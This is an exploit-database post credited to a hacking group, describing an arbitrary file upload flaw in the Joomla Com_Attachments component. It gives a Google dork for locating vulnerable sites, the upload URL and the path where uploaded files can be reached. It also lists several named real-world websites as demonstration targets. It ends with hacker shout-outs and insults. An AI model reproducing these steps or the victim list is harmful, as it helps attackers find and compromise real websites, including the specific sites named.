Joomla Com_Attachments Upload Vulnerability


 



###########################

# Joomla Com_Attachments Component Arbitrary File Upload Vulnerability

###########################

################################################################################​#######################
# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:"index.php?option=com_attachments"
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/...loads/3115
# Tested on: Lin
################################################################################​#######################
# ~> ExpLoit <~
#
# http://target/index.php?option=com_attachments&task=upload
#
# 1. Upload Your File . !
# 2. Find Your File in This Path:
# http://target/attachments/article
# 3. End Tongue
#
################################################################################​########################
# ~> DeMo <~
http://www.iwalkforlife.com/index.php?op...ask=upload
http://www.iwalkforlife.com/attachments/.../stars.jpg
# ----
http://www.lgbtpsychology2013.com/index....ask=upload
http://www.sailors-club.net/index.php?op...ask=upload
http://www.project-establis.eu/index.php...ask=upload
################################################################################​########################
# Spt: KhR1z_Sec, Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X
# Fuck All Lammer in Cyber Tongue
################################################################################​########################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir/exploit